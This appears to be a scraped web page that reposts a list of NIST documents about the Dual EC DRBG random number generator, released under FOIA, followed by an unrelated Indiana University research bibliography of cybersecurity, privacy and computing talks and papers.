Never Ending Security

NISTFOIA: FOIA for NIST documents related to the design of Dual EC DRBG



Results of a recent FOIA for NIST documents related to the design of Dual EC DRBG.

These FOIA results are the combined result of two separate requests. Thanks to the following requestors:

  • Matthew Stoller and Rep. Alan Grayson
  • Andrew Crocker and Nate Cardozo of EFF

I have contributed only OCR and hosting. Happy hunting,

Matt Green, 6/5/2014


1.15.2015 production/9.1.2 Keyless Hash Function DRBG.pdf
1.15.2015 production/ANSI X9.82 Discussions.pdf
1.15.2015 production/ANSI X9.82, Part 3 DRBGs Powers point July 20, 2004.pdf
1.15.2015 production/Appendix E_ DRBG Selection.pdf
1.15.2015 production/Comments on X9.82, Part 4_Constructions.pdf
1.15.2015 production/E1 Choosing a DRBG Algorithm.pdf
1.15.2015 production/Five DRBG Algorithms Kelsey, July 2004.pdf
1.15.2015 production/Hash Funciton chart.pdf
1.15.2015 production/Letter of transmittal 1.15.2015 .pdf
1.15.2015 production/Part 4_Constructions for Building and Validating RBG Mechanisms.pdf
1.15.2015 production/Scan_2015_01_27_13_05_55_026.pdf
1.15.2015 production/Validation Testing and NIST Statistical Test Suite July 22, 2004.pdf
1.22.2015 production/10.1.2 Hash function DRBG Using HMAC.pdf
1.22.2015 production/10.1.3 KHF_DRBG.pdf
1.22.2015 production/8.6.7 Nonce.pdf
1.22.2015 production/8.7 Prediction Resistance and Backtracking Resistance.pdf
1.22.2015 production/ANSI X9.82 Part 3 Draft July 2004.pdf
1.22.2015 production/Annex G_Informative DRBG mechanism Security Properties.pdf
1.22.2015 production/Appendix G Informative DRBG Selection.pdf
1.22.2015 production/Comments on X9.82 Part 1, Barker May 18, 2005.pdf
1.22.2015 production/Cryptographic security of Dual_EC_DRBG.pdf
1.22.2015 production/D.1 Choosing a DRBG Algorithm.pdf
1.22.2015 production/DRBG Issues Power Point July 20, 2004.pdf
1.22.2015 production/Draft X9.82 Part 3 Draft May 2005.pdf
1.22.2015 production/E.1 Choosing a DRBG Algorithm (2).pdf
1.22.2015 production/E.1 Choosing a DRBG Algorithm.pdf
1.22.2015 production/Final SP 800-90 Barker May 26, 2006.pdf
1.22.2015 production/Fwd_Final SP 800-90 Barker May 26, 2006.pdf
1.22.2015 production/Kelsey comments on SP April 12, 2006.pdf
1.22.2015 production/Latest SP 800-90 Barker May 5, 2006.pdf
1.22.2015 production/Letter of transmittal 1.22.2015.pdf
1.22.2015 production/SP 800-90 Barker June 28, 2006.pdf
1.22.2015 production/SP 800-90_pre-werb version> Barker May 9, 2006.pdf
1.22.2015 production/Terse Description of two new hash-based DRGBs Kelsey, January 2004.pdf
1.22.2015 production/Two New proposed DRBG Algorithms Kelsey January 2004.pdf
1.22.2015 production/X9.82, RGB, Issues for the Workshop.pdf
6.4.2014 production/001 – Dec 2005 -NIST Recomm Random No. Gen (Barker-Kelsey).pdf
6.4.2014 production/002 – Dec 2005 – NIST Recomm Random No. Gen (Barker-Kelsey)(2).pdf
6.4.2014 production/003 – Sept 2005 – NIST Recomm Random No. Gen (Barker-Kelsey).pdf
6.4.2014 production/004 – Jan 2004 – Terse Descr. of Two New Hash-Based DRBGs.pdf
6.4.2014 production/005 – Proposed Changes to X9.82 Pt. 3 (Slides).pdf
6.4.2014 production/006 – NIST Chart 1.pdf
6.4.2014 production/007 – RNG Standard (Under Dev. ANSI X9F1) – Barker.pdf
6.4.2014 production/008 – Random Bit Gen. Requirements.pdf
6.4.2014 production/009 – Seed File Use.pdf
6.4.2014 production/010 – NIST Chart 2.pdf
6.4.2014 production/011 – 9.12 Choosing a DRBG Algorithm.pdf
6.4.2014 production/012 – May 14 2005 – Comments on ASC X9.82 Pt. 1 – Barker.pdf
6.4.2014 production/013 – X9.82 Pt. 2 – Non-Deterministic Random Bit Generators.pdf

More information is available at: https://github.com/matthewdgreen/nistfoia


Indiana University Pervasive Technology Institute Bibliography


Cate, F. H., The Growing Importance – and Irrelevance – of Data Protection Law, 2012 PIPA Conference, Offices of the Information and Privacy Commissioners of Alberta and British Columbia, Calgary, Canada, Nov 2012, Submitted.

Cate, F. H., and V. Mayer-Schonberger, Notice and Consent in a World of Big Data Technology Academics Policy Blog, Nov 2012, Submitted.

Shackelford, S., Southeast Academy of Legal Studies in Business (SEALSB), Southeast Academy of Legal Studies in Business (SEALSB), Miami, FL, Nov 2012, Submitted.

Cate, F. H., and B. E. Cate, The Supreme Court and Information Policy International Data Privacy Law, 4, vol. 2, Nov 2012, Submitted.

Cate, F. H., J. Dempsey, and I. Rubinstein, Systematic Government Access to Private-Sector Data International Data Privacy Law, 4, vol. 2, Nov 2012, Submitted.

Shackelford, S. J., Toward Cyber Peace: Managing Cyber Attacks through Polycentric Governance American University Law Review, no. 2013, Nov 2012, Submitted.

Li, F., X. Zou, P. Liu, and Y. Chen, New threats to health data privacy BioMed Central, Nov 2011, Submitted.

Qiu, J., and S.-H. Bae, Performance of Windows Multicore Systems on Threading and MPI, Bloomington, IN, Indiana University, Nov 2010, Submitted.

Cate, F. H., Consumer Privacy in an Age of Universal and Instant Communications, Advance 2012, ID Analytics, San Diego, CA, Oct 2012, Submitted.

Cate, F. H., Is There Any Hope for Cybersecurity, Stanford University Computer Science Department, Stanford, CA, Oct 2012, Submitted.

Cate, F. H., Mr. President, We Have a Situation, 2012 CACR Cybersecurity Summit, Indianapolis, IN, Oct 2012, Submitted.

Fidler, D. P., Mr. President, We Have a Situation, 2012 CACR Cybersecurity Summit, Indianapolis, IN, Oct 2012, Submitted.

Cate, F. H., Privacy, Law and Technology: What Happens Next?, Stanford Law School, Stanford, CA, Oct 2012, Submitted.

Cate, F. H., Private-Sector Profiling, Closed Session of the 34th International Data Protection and Privacy Commissioners’ Conference, Punta del Este, Uruguay, Oct 2012, Submitted.

Shackelford, S. J., Neither Magic Bullet Nor Lost Cause: Land Titling and the Wealth of Nation (forthcoming) New York University Environmental Law Journal, Sep 2013, Submitted.

Cate, F. H., Cate vs. Shel: The Great Cloud Debate, Statewide IT Conference, Indiana University, Bloomington, IN, Sep 2012, Submitted.

Fidler, D. P., Legal Aspects of NATO Cyber Cooperation Activities, NATO Legal Conference, Tirana, Albania, Sep 2012, Submitted.

Cate, F. H., Microsoft Global Privacy Summit (Moderator), Microsoft Global Privacy Summit, Redmond, WA, Sep 2012, Submitted.

Cate, F. H., Notice and Consent in a World of Big Data, Microsoft Corporation, Sep 2012, Submitted.

Cate, F. H., Roundtable on Cyber Threats, Objectives, and Responses (Moderator), Roundtable on Cyber Threats, Objectives, and Responses, Pentagon City, VA, Sep 2012, Submitted.

von Laszewski, G., H. Lee, J. Diaz, F. Wang, K. Tanaka, S. Karavinkoppa, G. C. Fox, and T. Furlani, Design of an Accounting and Metric-based Cloud-shifting and Cloud-seeding framework for Federated Clouds and Bare-metal Environments The International Conference on Autonomic Computing (IAC), San Jose, CA, Aug 2012, Submitted.

Cate, F. H., A Time to Act, 43rd Triennial Council of Phi Beta Kappa, Palm Beach, FL, Aug 2012, Submitted.

Ruan, G., H. Zhang, E. Wernert, and B. Plale, TextRWeb: Large-Scale Text Analytics with R on the Web Conference on Extreme Science and Engineering Discovery Environment (XSEDE’14), Atlanta, USA, Jul 2014, Submitted.

Kapadia, A., V. Garg, S. Patil, and L. Jean Camp, Peer-produced Privacy Protection IEEE International Symposium on Technology and Society, Jul 2013, Submitted.

Rundle, J., and G. Fox, Computational Earthquake Science Computing in Science & Engineering, Jul 2012, Submitted.

Welch, V., Security at the Cyberborder Workshop Report Presentation, Summer 2012 ESCC/Internet2 Joint Techs, Jul 2012, Submitted.

Zhanquan, S., and G. Fox, Study on Parallel SVM Based on MapReduce The 2012 International Conference on Parallel and Distributed Processing Techniques and Applications, Las Vegas NV USA, Jul 2012, Submitted.

Zeng, J., G. Ruan, A. Crowell, A. Prakash, and B. Plale, Cloud Computing Data Capsules for Non-Consumptive Use of Texts 5th Workshop on Scientific Cloud Computing (ScienceCloud), Vancouver, Canada, Jun 2014, Submitted.

Shackelford, S. J., Cyber Peace: Countering Cyber Attacks Around the World, IU Mini University, Bloomington, IN, Jun 2012, Submitted.

Fidler, D. P., The Ethics of ‘Non-Lethal’ Weapons, National Research Council’s Committee on Ethical and Societal Issues in National Security Applications of Emerging Technologies, Irvine, CA, Jun 2012, Submitted.

Shackelford, S. J., Fragile Merchandise: A Comparative Analysis of the Privacy Rights of Public Figures American Business Law Journal, vol. 19, no. 1, Jun 2012, Submitted.

Fidler, D. P., Inter Arma Silent Leges Redux? The Law of Armed Conflict and Cyberconflict National Security and Cyberspace: Threats, Opportunities, and Power in a Virtual World, Washington D.C., Georgetown University Press, pp. 71-87, Jun 2012, Submitted.

Cate, F. H., Overclocked: Law and Privacy in the Digital World, 2012 Bench Bar Conference, Indianapolis BAR Association, French Lick, IN, Jun 2012, Submitted.

Cate, F. H., The Supreme Court and Privacy in the Commercial Sector, The Center for Information Policy Leadership Annual Retreat, Washington, D.C., Jun 2012, Submitted.

Cate, F. H., The Growing Importance (and Irrelevance) of International Data Protection Law, 2013 Manitoba Access, Privacy, Security & Information Conference—Making Connections, Winnipeg, Canada, May 2013, Submitted.

Barnett, W. K., and R. LeDuc, Next Generation Cyberinfrastructures for Next Generation Sequencing and Genome Science, The AAMC 2013 Information Technology in Academic Medicine Conference Vancouver, CA. June 5, 2013 , Vancouver, CA., May 2013, Submitted.

 Download: 2013_aamc_gir_ncgas-barnett-final.pptx (12.99 MB)

Cate, F. H., The Promise and Perils of Personal Information in Healthcare, 2nd Annual Western Canada Health Information Privacy Symposium, May 2013, Submitted.

Cate, F. H., The Promise and Perils of Personal Information in Healthcare, Monroe-Owen County Medical Society Annual Meeting, Bloomington, Indiana, May 2013, Submitted.

, Accelerating System Software for Extreme Scale Computing – Keynote Address, ATIP/A*CRC Workshop on Accelerator Technologies for HPC, Singapore, May 2012, Submitted.

Jallalbarsari, V., and D. Leake, Customizing Question Selection and Facilitating Flexible Response in Conversational Case-Based Reasoning Twenty-Fifth Florida Artificial Intelligence Research Society Conference, Marco Island, FL USA, AAAI Press, May 2012, Submitted.

Fidler, D. P., Inter Arma Silent Leges Redux? Law of Armed Conflict and Cyberconflict NATIONAL SECURITY AND CYBERSPACE, May 2012, Submitted.

Fidler, D. P., The Internet, Human Rights, and U.S. Foreign Policy: The Global Online Freedom Act of 2012 AMERICAN SOCIETY OF INTERNATIONAL LAW INSIGHTS, May 2012, Submitted.

Huan, T., X. Wu, Z. Bai, and J. Y. Chen, Seed-weighted Random Walk Ranking for Cancer Biomarker Prioritization: a Case Study in Leukemia International Journal of Data Mining and Bioinformatics, May 2012, Submitted.

Mitchell, J. E., D. J. Crandall, G. C. Fox, and J. D. Paden, A SEMI-AUTOMATIC APPROACH FOR ESTIMATING NEAR SURFACE INTERNAL LAYERS FROM SNOW RADAR IMAGERY IGARSS 2013 Sunday 21 – Friday 26 July 2013 IEEE International Geoscience and Remote Sensing Symposium, Melbourne, Australia “Building a Sustainable Earth through Remote Sensing”, May 15 2013, Submitted.

Ozsoy, A., A. Chauhan, and M. Swany, Achieving TeraCUPS on Longest Common Subsequence Problem using GPGPUs IEEE Supercomputing 2013 (SC13), Apr 2013, Submitted.

Cate, F. H., Cybersecurity Threats and Policy Issues, Board of Directors of the IU Credit Union retreat, French Lick, Indiana, Apr 2013, Submitted.

Cate, F. H., Privacy Principles for the 21st Century, Privacy Policy Workshop at Microsoft Corporation, Redmond, Washington, Apr 2013, Submitted.

Gunarathne, T., B. Salpitikorala, A. Chauhan, and G. Fox, Iterative Statistical Kernels on Contemporary GPUs International Journal of Computational Science and Engineering, Apr 2012, Submitted.

Wang, L., G. von Laszewski, S. Marru, J. Tao, and M. Kunze, Schedule Distributed Virtual Machines in a Service Oriented Environment, talk not presented due to visa issues, 24th IEEE International Conference on Advanced Information Networking and Applications (AINA’10), Perth, Australia, Apr 2010, Submitted.

 Download: aina10.pdf (1.11 MB)

Anderson, M., talk: Improving scaling constrained applications using ParalleX, Pervasive Technology Institute Major Project Review, Bloomington, IN, Apr 2012, Submitted.

Adusumilli, P., Y. Sui, X. Zou, B. Ramamurthy, and F. Li, A Key Distribution Scheme for Distributed Group with Authentication Capability International Journal of Performability Engineering, vol. 8, no. 2, Mar 2012, Submitted.

Fidler, D. P., Tinker, Tailor, Soldier, Duqu: Why Cyberespionage is More Dangerous than You Think INTERNATIONAL JOURNAL OF CRITICAL INFRASTRUCTURE PROTECTION, vol. 5, no. 1, Mar 2012, Submitted.

Anderson, M., talk: Graphs in Adaptive Mesh Refinement, PXGL Kickoff meeting, Bloomington, IN, Mar 2012, Submitted.

Sterling, T., Connections for Coordination of DOE Exascale Research and Development, Livermore, California, Presentation at the DOE Exascale Ecosystem Coordination Meeting, Feb, Submitted.

Myers, S. A., M. Sergi, and A. Shelat, Black-Box Proof of Knowledge of Plaintext and Multiparty Computation with Low Communication Overhead Proceedings of 10th Annual Theory of Cryptography Conference, Submitted.

Kowalczyk, S., L. Auvil, and M. Chen, HTRC demo and hands-on, The 13th ACM/IEEE-CS joint conference on Digital libraries, Indianapolis, IN, Submitted.

In Press

Huan, T., X. Wu, Z. Bai, and J. Y. Chen, Seed-weighted Random Walk Ranking for Cancer Biomarker Prioritization: a Case Study in Leukemia International Journal of Data Mining and Bioinformatics, May 2012, In Press.

Springer, J., F. Zhang, P. Hussey, C. Buck, F. Regnier, and J. Y. Chen, Towards a Metadata Model for Mass-Spectrometry Based Clinical Proteomics Current Bioinformatics, vol. 7, no. 4, May 2012, In Press.

2015

Bhattacharyya, S., and M. Chen, HathiTrust Research Center: Large-Scale Computational Analysis on the World’s First Massive Digital Library, Workshop, Linguistic Society of America (LSA)’s Biennial Linguistic Institute, Chicago, IL, Jul 2015.

2014

Plale, B., Bridging Digital Humanities Research and Large Repositories of Digital Text, 2nd Encuentro de Humanistas Digitales, Biblioteca Vasconcelos, Mexico City, Mexico, May 21 2014.

Organisciak, P., B. Plale, S. J. Downie, and L. Auvil, Panel Discussion: ‘The HathiTrust Research Center.’, Chicago Colloquium on Digital Humanities and Computer Science (DHCS 2014), Northwestern University, Evanston, Illinois, Oct 2014.

Organisciak, P., S. Bhattacharyya, L. Auvil, and S. J. Downie, Large-scale text analysis through the HathiTrust Research Center, Digital Humanities 2014 (DH2014) Conference, Lausanne, Switzerland, Jul 2014.

Ruan, G., H. Zhang, E. Wernert, and B. Plale, TextRWeb: Large-Scale Text Analytics with R on the Web XSEDE 2014, Atlanta, GA USA, Jul 2014.

 Download: xsede_14_-_xsede.pdf (11.29 KB)

Ando, M., J. Sotomil, and H. Zhang, Visualizing and Correlating Fluorescence and Microfocus Computed Tomograph (uCT) Images of White-spot Lesions The 61st Congress of the European Organisation for Caries Research, Greifswald, Germany, Jul 2014.

 Download: hui_zhang_-_publications.pdf (16.93 KB)

Chen, M., HathiTrust Research Center: Technical Challenges, Open Syllabus Project (OSP) Workshop, June 6-7, 2014, New York, NY., Jun 2014.

Ping, R. J., R. LeDuc, M. R. Link, S. A. Michael, and E. A. Wernert, UITS Research Technologies Cyberinfrastructure for Researchers: IUSE InfoShare 2014, Indiana University Southeast, Library (x2) and Natural Sciences Building, Apr 2014.

 Download: 2014iuse_uits-rt-infoshare.pdf (2.64 MB)

Ando, M., T. Sakagami, H. Zhang, G. J. Eckert, and D. Zero, Evaluation of Natural Non-cavitated Caries Lesions for Severity and Activity AADR Annual Meeting & Exhibition, Charlotte, NC, USA, Mar 2014.

 Download: archives.cgi_.pdf (24.28 KB)

Chen, M., HathiTrust Research Center: Challenges and Opportunities in Big Text Data, Digital Library Brown Bag, Indiana University Bloomington Libraries., Mar 2014.

Chen, M., Opportunities and Challenges of Text Mining HathiTrust Digital Library, Computational Linguistics Seminar, Indiana University Bloomington, Feb 2014.

Xu, L., H. Zhang, and Y. C, Cooperative Gazing Behaviors in Multi-robot Human Interaction Journal of Interaction Studies, vol. 14, no. 3, Jan 2014.

 Download: john_benjamins_publishing_company.pdf (148 bytes)

Bhattacharyya, S., and R. Mehta, Investigating Writer’s Attitudes by Mining a Large Corpus of Books: Preliminary Research, Postdoctoral Research Symposium, Society of Postdoctoral Scholars, University of Illinois, Urbana-Champaign, Jan 2014.

Downie, S. J., K. Dougan, S. Bhattacharyya, and C. Fallaw, The HathiTrust Corpus: A Digital Library for Musicology Research? First International Digital Libraries for Musicology Workshop (DLfM 2014), London, UK, 2014.

York, J., and S. Bhattacharyya, Humanistic inquiry with large corpora of digitized text and metadata: Towards new epistemologies? Workshop, 130th Annual Conference of the Modern Language Association (MLA), Vancouver, Canada, 2014.

2013

Fox, G., T. Hey, and A. Trefethen, Where does all the data come from? “Data Intensive Science”, January 25 2013.

Fox, G., Distributed Data and Software Defined Systems BDEC Big Data and Extreme-Scale Computing Charleston April 30 to May 01, Renaissance Charleston Historic District Hote, April 20 2013.

Cole, T., and H. Green, Workset Creation for Analysis — an HTRC initiative, Coalition for Networked Information (CNI) Membership Meeting, Washington, DC., Dec 2013.

Downie, S. J., The Workset Creation for Scholarly Analysis (WCSA) Prototyping Project: Background and goals, Chicago Colloquium on Digital Humanities and Computer Science, Chicago, IL, Dec 2013.

Dunn, J. W., and S. Elnabli, Avalon Media System, Association of Moving Image Archivists, Seattle, Washington, Dec 2012, 2013.

McDonald, R. H., Kuali OLE Seminar, National and University Libraries (SCONUL-UK), London, UK, Dec 2012, 2013.

Winkler, M., and R. H. McDonald, Kuali OLE: A Community Collaboration in Software for and by Libraries. Information Standards Quarterly (ISQ), vol. 24(4), Dec 2012, 2013.

Swany, M., Challenges and Solutions in Large Scale Data Movement, Supercomputing 2013, Denver, CO, Nov 2013.

Reagan, D., E. Vesperini, A. L. Varri, P. Beard, and C. Eller, Early Evolution of a Star Cluster in the Galactic Tidal Field, Supercomputing 2013 Visualization Showcase, Denver, Colorado, Nov 2013.

Kissel, E., M. Swany, B. Tierney, and E. Pouyoul, Efficient wide area data transfer protocols for 100 Gbps networks and beyond In Proceedings of the Third International Workshop on Network-Aware Data Management (NDM ’13), Denver, CO, Nov 2013.

Reagan, D., A. S. Schneider, C. J. Horowitz, J. Hughto, D. K. Berry, E. A. Wernert, and C. Eller, Nuclear Pasta, Supercomputing 2013 Visualization Showcase, Denver, Colorado, Nov 2013.

Plale, B., Opportunities and Challenges of Text Mining HathiTrust Digital Library, Koninklijke Bibliotheek, Den Haag, Netherlands, Nov 2013.

Ping, R. J., K. Seiffert, J. Tillotson, G. Turner, and K. Kallback-Rose, Ready, Set, Robots!: Early development of K-12 in STEM, The International Conference for High Performance Computing, Networking, Storage and Analysis (SC13), http://sc13.supercomputing.org/, Denver, CO, Nov 2013.

 Download: readysetrobotspresentation.pdf (15.02 MB)

Ozsoy, A., A. Chauhan, and M. Swany, Towards Tera-scale Performance for Longest Common Subsequence using Graphics Processors, Poster at International Conference for High Performance Computing, Networking, Storage and Analysis, Denver, CO, Nov 2013.

McDonald, R. H., S. Liyanage, M. Pathirage, Z. Peng, J. Zeng, G. Ruan, and M. Chen, Using Hathi Trust Center Tools, Catapult Workshop., Bloomington, IN, Nov 2013.

Hess, K., S. J. Downie, T. Cole, and H. Green, Workset Creation for Scholarly Analysis: Preliminary Research at HathiTrust Research Center, Community Idea Exchange presented at: DLF Forum 2013, Austin, TX, Nov 2013.

El-Khamra, Y., N. Gaffney, D. Walling, E. Wernert, W. Xu, and H. Zhang, Performance evaluation of R with Intel Xeon Phi Coprocessor First Workshop on Benchmarks, Performance Optimization, and Emerging hardware of Big Data Systems and Applications (BPOE 2013), in conjunction with 2013 IEEE International Conference on Big Data (IEEE Big Data 2013), Silicon Valley, CA, USA, Oct 2014, 2013.

 Download: ieee_xplore_abstract_-_performance_evaluation_of_r_with_intel_xeon_phi_coprocessor.txt (11.22 KB)

Boyles, M., D. Chattopadhyay, and D. Bolchini, Advanced Visualization and Collaboration using IQ-Walls, Indiana University Statewide IT Conference, Bloomington, IN, Oct 2013.

Frend, C., Augmented Reality at IU, Indiana University Statewide IT Conference, Bloomington, IN, Oct 2013.

Plale, B., Big Data Opportunities and Challenges for IR, Text Mining and NLP, Int’l Workshop on Mining Unstructured Big Data Using Natural Language Processing (MNLP 2013), co-located with ACM Int’l Conference on Information and Knowledge Management, San Francisco, CA, Oct 2013.

Underwood, T., M. Black, L. Auvil, and B. Capitanu, Mapping Mutable Genres in Structurally Complex Volumes 2013 IEEE International Conference on Big Data, Santa Clara, CA, Oct 2013.

Luo, Y., E. Kissel, B. Plale, and M. Swany, Network Transfer over Pacific Rim on PRAGMA Cloud, The 25th Workshop of Pacific Rim Applications and Grid Middleware Assembly (PRAGMA25), Beijing, China, Oct 2013.

Zhou, Q., and B. Plale, Provenance Collection of Biodiversity Analysis on PRAGMA Cloud for Data Sharing, The 25th Workshop of Pacific Rim Applications and Grid Middleware Assembly (PRAGMA25), Beijing, China, Oct 2013.

Plale, B., Big Data and Open Access: On Track for Collision of Cosmic Proportions?, 2nd Int’l LSDMA-Symposium – The Challenge of Big Data in Science – with a focus on Big Data Analytics, Karlsruhe, Germany, Sep 2013.

Stewart, C. A., M. R. Link, and D. Y. Hancock, Big Red II & Supporting Infrastructure, IEEE Cluster 2013, Indianapolis, Indiana, Sep 2013.

Stewart, C. A., Goodbye from Indianapolis, IUPUI, and IEEE Cluster 2013, Cluster 2013, Indianapolis, Indiana, Sep 2013.

Kowalczyk, S., K. Hess, and L. Auvil, Hands On: Workset Builder, Portal and SEASR., HTRC UnCamp 2013, Champaign, IL, Sep 2013.

Plale, B., R. McDonald, and M. Chen, The HathiTrust Research Center (HTRC): Exploration of the World’s First Massive Digital Library, Digital HPS (History and Philosophy of Science) workshop, Indiana University Bloomington, Sep 2013.

Shankar, A., and W. K. Barnett, HIPAA and Advanced Scientific Computing The Coalition for Academic Scientific Computation, Arlington, Va., Sep 2013.

 Download: casc_hipaa-091713.docx (117.15 KB)

Mitchell, J. E., D. J. Crandall, G. C. Fox, and J. D. Paden, A Survey of Techniques for Detecting Layers in Polar Radar Imagery Abstract for International Symposium on Radioglaciology, in conjunction with the International Glaciological Society from September 9 to 13, 2013 , CReSIS at the University of Kansas, Lawrence, Kansas, Sep 2013.

Reagan, D., W. Sherman, E. Vesperini, A. Varri, and C. Eller, Visualization of Globular Star Clusters, IEEE Cluster 2013 Visualization Showcase, Sep 2013.

Reagan, D., A. Schneider, C. Horowitz, J. Hughto, D. Berry, E. Wernert, and C. Eller, Visualization of Nuclear Pasta, IEEE Cluster 2013 Visualization Showcase, Sep 2013.

Stewart, C. A., Welcome to Indianapolis, IUPUI, and IEEE Cluster 2013, IEEE Cluster 2013, Indianapolis, Indiana, Sep 2013.

Ruan, G., H. Zhang, and B. Plale, Exploiting MapReduce and Data Compression for Data-intensive Applications XSEDE 13: Gateway to Discovery, San Diego, CA, ACM, Jul 2013.

Ruan, G., H. Zhang, and B. Plale, Exploiting MapReduce and data compression for data-intensive applications Conference on Extreme Science and Engineering Discovery Environment: Gateway to Discovery (XSEDE ’13), San Diego, CA, Jul 2013.

Kowalczyk, S. T., HathiTrust Research Center: Big Data for Digital Humanities: A Panel Discussion on Managing Big Data and Big Metadata. Joint Conference on Digital Libraries (JCDL 2013), Indianapolis, IN, ACM/IEEE, Jul 2013.

Chen, M., U. Pavalanathan, S. Jensen, and B. Plale, Modeling Heterogeneous Data Resources for Social-Ecological Research: A Data-Centric Perspective Joint Conference on Digital Libraries 2013 (JCDL 2013), Indianapolis, IN, Jul 2013.

Knepper, R., B. Hallock, C. A. Stewart, M. Link, and M. Jacobs, Rockhopper: a true HPC system with cloud concepts, XSEDE CONFERENCE, San Diego, CA. 92101, Jul 2013.

 Download: cluster13poster.pdf (193.34 KB)

Kanewala, T. A., M. Pierce, and S. Marru, Secure Credential Sharing in Science Gateways, XSEDE 2013 SAN DIEGO, CA, Jul 2013.

 Download: xsede13_submission_261_1_2.pdf (314.32 KB)

Zhang, H., M. J. Boyles, G. Ruan, H. Li, H. Shen, and M. Ando, XSEDE-enabled high-throughput lesion activity assessment Conference on Extreme Science and Engineering Discovery Environment: Gateway to Discovery (XSEDE ’13), San Diego, CA, Jul 2013.

Ozsoy, A., A. Chauhan, and M. Swany, Achieving TeraCUPS on Longest Common Subsequence Problem using GPGPUs The 19th IEEE International Conference on Parallel and Distributed Systems (ICPADS’13), Seoul, South Korea, Jun 2013.

Edmonds, N., J. Willcock, and A. Lumsdaine, Expressing Graph Algorithms Using Generalized Active Messages International Conference on Supercomputing, Jun 2013.

McDonald, R., and Y. Sun, The HathiTrust Research Center (HTRC): An Overview and Demo, Indiana University Librarians’ Day, Indianapolis, IN, Jun 2013.

Ganote, C., and T. Doak, Intro to Bioinformatics – Assembling a Transcriptome, Presented during the Clark State student visit and workshop, Bloomington, Indiana, Jun 2013.

 Download: assemblyshort_t.pptx (260.08 KB)

LeDuc, R., Leveraging the National Cyberinfrastructure for Top Down Mass Spectrometry, Annual Conference for the American Society for Mass Spectrometry, Minneapolis, Minnesota, Jun 2013.

 Download: lightning_talk_final.pptx (602.96 KB)

LeDuc, R., and L.-S. Wu, Using Prior Knowledge to Improve Scoring in High-Throughput Top-Down Proteomics Experiments, American Society for Mass Spectrometry Annual Conference, Minneapolis, Minnesota, Jun 2013.

 Download: leduc_asms_scoring_talk-3.pptx (989.93 KB)

Wimalasena, C., S. Marru, and M. Pierce, Derivations from Science Gateway Data Management Survey, XSEDE 2013 San Diego, CA July 22-25th, 2013, May 2013.

McKelvey, K., and F. Menczer, Design and Prototyping of a Social Media Observatory First International Web Observatory Workshop (WOW), Rio de Janeiro, Brazil, May 2013.

Plale, B., and Y. Sun, Digital Humanities at Scale: HathiTrust Research Center, University of Notre Dame digital humanities seminar, South Bend, IN, May 2013.

Ahn, Y.-Y., and S. Ahnert, The Flavor Network Leonardo, MIT Press Journals, vol. 46, no. 3, pp. 272-273, May 2013.

Holk, E., M. Pathirage, A. Chauhan, A. Lumsdaine, and N. D. Matsakis, GPU Programming in Rust: Implementing High-Level Abstractions in a Systems-Level Language Eighteenth International Workshop on High-Level Parallel Programming Models and Supportive Environments (HIPS’13), May 2013.

McKelvey, K., and F. Menczer, Interoperability of Social Media Observatories Web Science 2013 Workshop: Building Web Observatories, Paris, France, May 2013.

Crandall, D., Layer-finding in radar echograms using probabilistic graphical models, Radar Echo Sounding Workshop, University of Copenhagen, Copenhagen, Denmark, May 2013.

Mao, H., X. Shuai, Y.-Y. Ahn, and J. Bollen, Mobile Communications Reveal the Regional Economy in Cote D’ivoire NetMob 2013: Data for Development Challenge, Cambridge, MA, May 2013.

Lumsdaine, A., New Execution Models are Required for Big Data at Exascale, Panel presentation at Big Data and Extreme-scale Computing, May 2013.

Lumsdaine, A., The Parallel BGL: A High-Performance Parallel Graph Algorithms Library, Presentation at University of Alabama at Birmingham, May 2013.

Weng, L., J. Ratkiewicz, N. Perra, B. Goncalves, C. Castillo, R. Bonchi, F. Schifanella, F. Menczer, and A. Flammini, The Role of Information Diffusion in the Evolution of Social Networks The 19th ACM SIGKDD conference on knowledge, discovery, and data mining. (KDD), Chicago, Illinois, May 2013.

Friedley, A., Shared Memory Communication in MPI, Berkeley, CA, Presentation at Lawrence Berkeley National Laboratory, May 2013.

Cate, F. H., Accountability Through Attribution: Real Name vs. Anonymity, U.S.-China Internet Industry Forum, Beijing, China, Apr 2013.

Ozsoy, A., A. Chauhan, and M. Swany, Achieving TeraCUPS on Longest Common Subsequence Problem using GPGPUs IEEE Supercomputing 2013 (SC13), Denver, CO, Apr 2013.

Dunn, J., and C. Stewart, The Avalon Media System: An Open Source Audio/Video System for Libraries and Archives, Coalition for Networked Information (CNI) Membership Meeting, San Antonio, Texas, Apr 2013.

Simms, S. C., Big Red II Workshop, Big Red II Workshop, Indiana University – Bloomington Campus, Apr 2013.

 Download: big_red_ll_workshop.pdf (372.33 KB)

Hallock, B., Cyberinfrastructure Resources for Bioinformatics Research, Bio-IT World Expo Boston MA, Apr 2013.

 Download: biwposter.pdf (410.51 KB)

Cate, F. H., Cybersecurity Challenges in Higher Education, Internet2 Annual Members Meeting, Crystal City, Virginia, Apr 2013.

Simms, S. C., Data Intensive Research Using the Lustre File System, Indiana University – Bloomington Campus, Apr 2013.

 Download: dod.pptx (14.14 MB)

Swany, M., Effective and Efficient Utilization of Networks, University of California, Santa Barbara CS Career Day 2013, Santa Barbara, CA, Apr 2013.

Knepper, R., and M. Standish, Forward Observer In-Flight Dual Copy System, U.S. Naval Academy Annapolis, Maryland, Apr 2013.

Arap, O., G. Brown, B. Himebaugh, and M. Swany, Implementing MPI_Barrier with the NetFPGA IEEE Supercomputing 2013 (SC13), Denver, CO, Apr 2013.

Plale, B., International Data Sharing, Open Access, and the Research Data Alliance, Advanced Regional & State Networks (ARNs): Envisioning the Future as Critical Partners in Data-Driven Science, Washington, D.C., Apr 2013.

Fidler, D. P., Internet Governance and the International Telecommunication Regulations, The Changing Face of Global Governance, Oxford, England, Apr 2013.

Fidler, D. P., The Jurisprudence of Cybersecurity, Big 10 Faculty Colloquium, University of Nebraska College of Law, Apr 2013.

Fidler, D. P., NATO, Cybersecurity, and International Law, Cyberconflict: Threats, Responses, and the Role of Law, St. John’s University School of Law in Queens, New York, Apr 2013.

Quick, R., Open Science Grid Campus Infrastructures Communities, EGI Community Forum Manchester UK, Apr 2013.

Quick, R., Open Science Grid Operations Overview, EGI Community Forum Manchester UK, Apr 2013.

Kulkarni, A., L. Ionkov, M. Lang, and A. Lumsdaine, Optimizing process creation and execution on multi-core architectures International Journal of High Performance Computing Applications, Apr 2013.

Sterling, T., ParalleX: Execution Models for Extreme-scale Computing, Rockville, MD, Presentation at the DOE Modeling Execution Models Program mid-term review, Apr 2013.

Cate, F. H., Password Vulnerability and Liability, Centre for Information Policy Leadership at Hunton & Williams LLP, Apr 2013.

